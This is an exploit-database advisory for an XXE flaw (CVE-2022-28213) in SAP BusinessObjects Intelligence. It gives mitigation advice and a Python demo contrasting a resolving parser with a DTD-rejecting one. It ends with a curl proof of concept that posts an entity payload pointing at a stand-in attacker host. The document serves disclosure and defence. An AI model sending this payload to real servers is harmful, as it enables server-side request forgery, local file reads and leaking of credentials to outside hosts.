Vendor: SAP
Product Name: BusinessObjects Intelligence
Submitted by: West Shepherd
CVSS: 8.1 (HIGH)
CWE: CWE-611 (XML External Entity (XXE))
CVE: CVE-2022-28213
Affected Version From: 4.2
Affected Version To: 4.3
Patch Exists: YES
CPE: a:sap:businessobjects_intelligence:4.3
Metasploit:
Other Scripts:
Platforms Tested: Windows Server 2019 x64
Year: 2022

SAP BusinessObjects Intelligence 4.3 – XML External Entity (XXE)

SAP BusinessObjects Intelligence 4.2 and 4.3 (CVE-2022-28213) accept attacker-supplied XML whose DOCTYPE declares external entities, and the server-side parser resolves them. A crafted request body can therefore make the server read arbitrary local files or open connections to hosts the attacker names, so the same bug also serves as a server-side request forgery (SSRF) primitive. The published PoC declares a parameter entity whose SYSTEM identifier is a UNC path on the attacker's host; a vulnerable Windows server confirms the flaw out of band by connecting to that host while it parses the logon request.

Mitigation:

Apply SAP's fix for the affected releases. Independently of the patch, every XML parser that handles request bodies should refuse DOCTYPE declarations outright, which rules out internal and external entity declarations alike; where a DTD cannot be refused, disable external general and parameter entities and do not let the parser resolve external identifiers (file paths, URLs or UNC paths). Check each parser instance separately, because in most XML libraries these settings are per parser rather than global.
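To make the description and the mitigation concrete, here is an added example (not code from the advisory, from West Shepherd, or from SAP) that takes the exact probe body the PoC sends to /biprws/logon/long and parses it twice with Python's standard-library expat parser. The "resolving" parser mimics a default-configured, DTD-processing parser and records the external identifier it is asked to fetch, which is the attacker's UNC path, instead of opening it; the "hardened" parser refuses the body at the DOCTYPE token, before any entity is declared, which is what "disable DTDs completely" amounts to in code. The logon body is a constructed stand-in for a legitimate request, not the real biprws element schema.

```python
import xml.parsers.expat as expat

# Copied from the PoC: a parameter entity whose SYSTEM id is a UNC path,
# referenced inside the DOCTYPE. %int; and %trick; are referenced but never
# declared, exactly as in the published request. There is no root element.
XXE_PROBE = (
    b'<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % '
    b'remote SYSTEM "\\\\attackerwebsite.com\\XXE\\example">%remote;%int;%trick;]>'
)

# Constructed stand-in for a legitimate logon body (the element names are an
# assumption, not the real biprws schema; any DTD-free document behaves the same).
LOGON_BODY = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<attrs><attr name="userName" type="string">Administrator</attr>'
    b'<attr name="auth" type="string">secEnterprise</attr></attrs>'
)


class DTDForbidden(ValueError):
    """Raised when a request body carries a DOCTYPE and so may declare entities."""


def external_ids_resolved(data: bytes) -> list:
    """Parse the way an entity-resolving parser does and return every external
    SYSTEM identifier the parser handed to its resolver.

    Parameter-entity expansion is switched on to mimic a DTD-processing parser.
    The resolver only records the identifier; a real one would open it, which
    for a UNC path on Windows means an outbound SMB connection to the attacker.
    """
    seen = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def resolver(context, base, system_id, public_id):
        seen.append(system_id)  # the fetch happens here in a vulnerable parser
        return 1                # non-zero tells expat to keep going

    parser.ExternalEntityRefHandler = resolver
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        # The probe has no root element, so the parse fails, but only after the
        # entity has already been resolved. The PoC relies on exactly that.
        pass
    return seen


def parse_without_dtd(data: bytes) -> list:
    """Hardened parse: reject the document at the DOCTYPE token, before any
    entity declaration is seen. Returns the element names parsed, in order."""
    names = []
    parser = expat.ParserCreate()

    def forbid(doctype_name, system_id, public_id, has_internal_subset):
        raise DTDForbidden("DOCTYPE %r rejected: DTDs are disabled" % doctype_name)

    parser.StartDoctypeDeclHandler = forbid
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(data, True)
    return names


def is_rejected(data: bytes) -> bool:
    """True when the hardened parser refuses the body outright."""
    try:
        parse_without_dtd(data)
    except DTDForbidden:
        return True
    return False


if __name__ == "__main__":
    print("resolving parser tried to fetch:", external_ids_resolved(XXE_PROBE))
    print("hardened parser rejects the probe:", is_rejected(XXE_PROBE))
    print("hardened parser accepts a normal body:", parse_without_dtd(LOGON_BODY))
```

The point of the first function is the order of events: the resolver runs while the DOCTYPE is still being read, so the outbound connection happens even though the document is not well formed and the request is ultimately rejected. That is why the advisory's probe needs no root element and why the fix has to act on the DOCTYPE itself rather than on what the application does with the parsed result.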

Exploit-DB raw data:

# Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
# Google Dork: N/A
# Date: 4/21/2022
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.sap.com/
# Software Link: https://www.sap.com/
# Version: 4.2 and 4.3
# Tested on: Windows Server 2019 x64
# CVE : CVE-2022-28213
# References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md

# Out-of-band probe: the body declares a parameter entity whose SYSTEM id is an
# attacker-controlled UNC path and references it inside the DOCTYPE. A vulnerable
# server resolves it while parsing the logon request, so the inbound connection
# at attackerwebsite.com confirms the bug even though the document has no root
# element. Replace attackerwebsite.com and example.com with your own hosts.
curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \
--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY %
remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \
https://example.com/biprws/logon/long